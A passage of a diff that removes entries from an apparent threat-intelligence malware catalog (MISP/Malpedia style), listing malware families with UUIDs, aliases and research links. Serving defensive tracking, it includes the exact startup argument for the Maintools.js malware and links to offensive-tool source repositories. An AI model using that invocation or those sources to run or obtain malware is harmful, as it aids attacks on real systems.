"http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" - ] - }, - "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", - "value": "Powmet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", - "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", - "http://resources.infosecinstitute.com/scanbox-framework/" - ] - }, - "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", - "value": "scanbox", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", - "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" - ] - }, - "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", - "value": "HTML5 Encoding", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", - "https://twitter.com/JohnLaTwC/status/915590893155098629" - ] - }, - "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", - "value": "Maintools.js", - "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", - "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef", - "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f" - ] - }, - "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", - "value": "Unidentified 050 (APT32 Profiler)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" - ] - }, - "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", - "value": "witchcoven", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", - "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/", - "https://github.com/kai5263499/Bella", - "https://github.com/kai5263499/Bella" - ] - }, - "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", - "value": "Bella", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Mask", - "Appetite" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] - }, - "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", - "value": "Careto", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] - }, - "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", - "value": "CoinThief", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", - "https://objective-see.com/blog/blog_0x2A.html" - ] - }, - "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", - "value": "Coldroot RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", - "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" - ] - }, - "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", - "value": "CpuMeaner", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", - "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", - "https://digitasecurity.com/blog/2018/02/05/creativeupdater/", - "https://objective-see.com/blog/blog_0x29.html" - ] - }, - "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", - "value": "CreativeUpdater", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", - "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" - ] - }, - "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", - "value": "Crisis", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", - "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" - ] - }, - "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", - "value": "Crossrider", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", - "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", - "https://www.f-secure.com/weblog/archives/00002466.html" - ] - }, - "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", - "value": "Dockster", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", - "https://objective-see.com/blog/blog_0x32.html" - ] - }, - "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", - "value": "Dummy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", - "https://github.com/Marten4n6/EvilOSX", - "https://twitter.com/JohnLaTwC/status/966139336436498432" - ] - }, - "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", - "value": "EvilOSX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", - "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", - "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" - ] - }, - "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", - "value": "FlashBack", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Quimitchin" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", - "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", - "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", - "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", - "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", - "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", - "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" - ] - }, - "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", - "value": "FruitFly", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", - "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" - ] - }, - "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", - "value": "HiddenLotus", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Revir" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", - "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", - "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" - ] - }, - "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", - "value": "iMuler", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", - "https://objective-see.com/blog/blog_0x16.html", - "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/", - "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html" - ] - }, - "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", - "value": "KeRanger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", - "https://objective-see.com/blog/blog_0x16.html", - "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", - "https://github.com/eset/malware-ioc/tree/master/keydnap" - ] - }, - "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", - "value": "Keydnap", - "description": "" - }, - { - "meta": { - "synonyms": [ - "KitM" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", - "https://www.f-secure.com/weblog/archives/00002558.html" - ] - }, - "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", - "value": "Kitmos", - "description": "" - }, - { - "meta": { - "synonyms": [ - "SedUploader", - "JHUHUGIT", - "JKEYSKW" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", - "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", - "https://objective-see.com/blog/blog_0x16.html", - "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf" - ] - }, - "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", - "value": "Komplex", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", - "https://objective-see.com/blog/blog_0x16.html", - "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" - ] - }, - "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", - "value": "Laoshu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", - "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/", - "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis" - ] - }, - "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", - "value": "Leverage", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", - "https://iranthreats.github.io/resources/macdownloader-macos-malware/" - ] - }, - "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", - "value": "MacDownloader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", - "https://objective-see.com/blog/blog_0x16.html" - ] - }, - "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", - "value": "MacInstaller", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", - "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service", - "https://objective-see.com/blog/blog_0x1E.html" - ] - }, - "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", - "value": "MacRansom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", - "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" - ] - }, - "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", - "value": "MacSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", - "https://objective-see.com/blog/blog_0x16.html" - ] - }, - "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", - "value": "MacVX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", - "https://objective-see.com/blog/blog_0x26.html" - ] - }, - "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", - "value": "MaMi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", - "https://objective-see.com/blog/blog_0x16.html", - "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/" - ] - }, - "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", - "https://objective-see.com/blog/blog_0x20.html" - ] - }, - "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", - "value": "Mughthesec", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", - "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" - ] - }, - "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", - "value": "OceanLotus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", - "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", - "https://news.drweb.com/show/?i=1750&lng=en&c=14" - ] - }, - "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", - "value": "Olyx", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Findzip" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", - "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" - ] - }, - "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", - "value": "Patcher", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", - "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", - "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/" - ] - }, - "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", - "value": "Pirrit", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Calisto" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", - "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", - "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", - "https://objective-see.com/blog/blog_0x1D.html", - "https://securelist.com/calisto-trojan-for-macos/86543/", - "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", - "https://objective-see.com/blog/blog_0x1F.html", - "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", - "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", - "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" - ] - }, - "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", - "value": "Proton RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet", - "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" - ] - }, - "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", - "value": "Pwnet", - "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack." - }, - { - "meta": { - "synonyms": [ - "Retefe" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", - "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", - "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", - "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga" - ] - }, - "uuid": "80acc956-d418-42e3-bddf-078695a01289", - "value": "Dok", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", - "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" - ] - }, - "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", - "value": "systemd", - "description": "General purpose backdoor" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", - "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", - "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" - ] - }, - "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", - "value": "Uroburos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", - " https://401trg.pw/an-update-on-winnti/", - "https://401trg.pw/winnti-evolution-going-open-source/" - ] - }, - "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", - "value": "Winnti", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", - "https://objective-see.com/blog/blog_0x16.html", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" - ] - }, - "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", - "value": "WireLurker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", - "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", - "https://news.drweb.com/show/?i=2679&lng=en&c=14" - ] - }, - "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", - "value": "Wirenet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", - "https://twitter.com/PhysicalDrive0/status/845009226388918273", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" - ] - }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd", - "https://objective-see.com/blog/blog_0x16.html" - ] - }, - "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", - "value": "XSLCmd", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", - "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", - "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" - ] - }, - "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", - "value": "PAS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Webshell by Orb" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", - "https://github.com/wso-shell", - "https://securelist.com/energetic-bear-crouching-yeti/85345/" - ] - }, - "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", - "value": "WSO", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos", - "https://www.group-ib.com/resources/threat-research/silence.html" - ] - }, - "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90", - "value": "Silence DDoS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", - "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] - }, - "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", - "value": "BONDUPDATER", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", - "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" - ] - }, - "uuid": "0db05333-2214-49c3-b469-927788932aaa", - "value": "GhostMiner", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy", - "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", - "https://github.com/matthewdunwoody/POSHSPY" - ] - }, - "uuid": "4df1b257-c242-46b0-b120-591430066b6f", - "value": "POSHSPY", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", - "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" - ] - }, - "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", - "value": "PowerWare", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", - "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] - }, - "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", - "value": "POWRUNER", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" - ] - }, - "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", - "value": "QUADAGENT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" - ] - }, - "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", - "value": "RogueRobin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", - "https://github.com/Kevin-Robertson/Tater" - ] - }, - "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", - "value": "Tater PrivEsc", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", - "https://github.com/Mr-Un1k0d3r/ThunderShell" - ] - }, - "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", - "value": "ThunderShell", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", - "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" - ] - }, - "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", - "value": "WMImplant", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", - "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", - "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", - "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", - "http://seclists.org/fulldisclosure/2017/Mar/7", - "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", - "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f" - ] - }, - "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", - "value": "BrickerBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", - "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", - "https://www.youtube.com/watch?v=Bk-utzAlYFI" - ] - }, - "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", - "value": "Saphyra", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] - }, - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", - "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", - "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" - ] - }, - "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", - "value": "7ev3n", - "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"" - }, - { - "meta": { - "synonyms": [ - "Hydraq", - "McRAT" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", - "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", - "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", - "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", - "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", - "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", - "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", - "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" - ] - }, - "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", - "value": "9002 RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "PinkKite" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", - "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", - "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" - ] - }, - "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", - "value": "AbaddonPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" - ] - }, - "uuid": 